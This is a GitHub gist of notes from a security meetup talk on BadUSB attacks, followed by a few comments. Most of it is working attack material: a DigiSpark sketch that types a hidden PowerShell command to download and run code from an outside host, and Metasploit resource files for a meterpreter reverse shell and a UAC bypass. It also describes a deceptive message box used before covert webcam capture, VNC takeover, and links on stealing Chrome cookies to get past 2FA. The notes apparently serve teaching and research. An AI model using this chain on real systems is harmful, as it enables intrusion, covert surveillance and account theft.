Last active
October 17, 2021 21:23
-
-
Save LuD1161/70cf859a2ba1df820c786e4f8b6fa331 to your computer and use it in GitHub Desktop.
Notes of Null talk on BadUSB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Bad USB code | |
#include "DigiKeyboard.h" | |
#define WorkingPin 1 // Just as an LED indicator, as to when the work is finished | |
void setup() { | |
} | |
void loop() { | |
digitalWrite(WorkingPin, HIGH); | |
DigiKeyboard.sendKeyStroke(0); | |
DigiKeyboard.delay(500); | |
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); | |
DigiKeyboard.delay(500); | |
DigiKeyboard.print("powershell.exe -nop -w hidden -c $t=new-object net.webclient;$t.proxy=[Net.WebRequest]::GetSystemWebProxy();$t.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $t.downloadstring('http://192.168.1.2:8080/nFUICYVjGMT6a');"); | |
DigiKeyboard.sendKeyStroke(KEY_ENTER); | |
digitalWrite(WorkingPin, LOW); | |
for (;;) { | |
/*Stops the digispark from running the scipt again*/ | |
} | |
} | |
## Metasploit resource file used in demonstration msf-web-delivery.rc | |
use exploit/multi/script/web_delivery | |
set Target 2 | |
set LHOST <YOUR_LOCAL_IP_HERE> | |
set LPORT 6680 | |
set payload windows/x64/meterpreter/reverse_tcp | |
set AutoRunScript post/windows/manage/migrate # This step is necessary otherwise the session just dies | |
exploit -j | |
## For Popping up an innocuous message box, before starting capturing webcam snaps | |
DEFCON 20: Weaponizing the Windows API with Metasploit : https://youtu.be/bdUT20fwwfI?t=1527 | |
railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) # 0x10 is for MB_ICONSTOP, taken from here : https://docs.microsoft.com/en-us/windows/desktop/api/winuser/nf-winuser-messagebox | |
If the above doesn't work you might need to put 'client' in the start of the command ( as shown in the video ), like this : | |
client.railgun.user32.MessageBoxA(0, "Windows has encountered some problem, with your webcam, needs to check", "Webcam 0x0002", 0x10) | |
## For VNC | |
After getting a meterpreter session : run vnc | |
Then connect with a VNC client on the "local machine" | |
## For privilege escalation ( https://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit/ ) | |
use exploit/windows/local/bypassuac_comhijack | |
set payload windows/x64/meterpreter/reverse_tcp | |
set session 2 | |
set LHOST <YOUR_LOCAL_IP_HERE> | |
exploit | |
## For extracting google chrome cookies, as extracting passwords would still need you to enter the OTP, if 2FA is enabled : | |
https://mango.pdf.zone/stealing-chrome-cookies-without-a-password | |
You can follow the discussion here ( quite interesting if you would ask ) : https://news.ycombinator.com/item?id=18376323 | |
There's a metasploit module available too : https://github.com/rapid7/metasploit-framework/blob/9616a9f79de0b22bfd142f12affd74cecbbd4413/documentation/modules/post/multi/gather/chrome_cookies.md | |
## State of the art things | |
Bad USB cables : https://mg.lol/blog/badusb-cables/ | |
O.M.G. cables : https://mg.lol/blog/omg-cable/ | |
## Other Useful Things | |
DigiSpark Scripts Repo : https://github.com/CedArctic/DigiSpark-Scripts | |
#shamelessSelfPromotion Ahead :p | |
You can read my other blogs here : https://lud1161.github.io/ | |
and | |
Here : https://lud1161.wordpress.com/ |
Hello @vishwaskheriwal, sorry to break out to you but the talk wasn't recorded and I am not getting time enough to make a tutorial for the same and put it up online.
Feel free to join for the talk , if and when it happens next.
Hello @vishwaskheriwal
this talk is happening again, tomorrow i.e. 29th Aug https://www.meetup.com/OWASP-Bangalore-Chapter/events/272556608/
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Sir can you provide a video on this topic.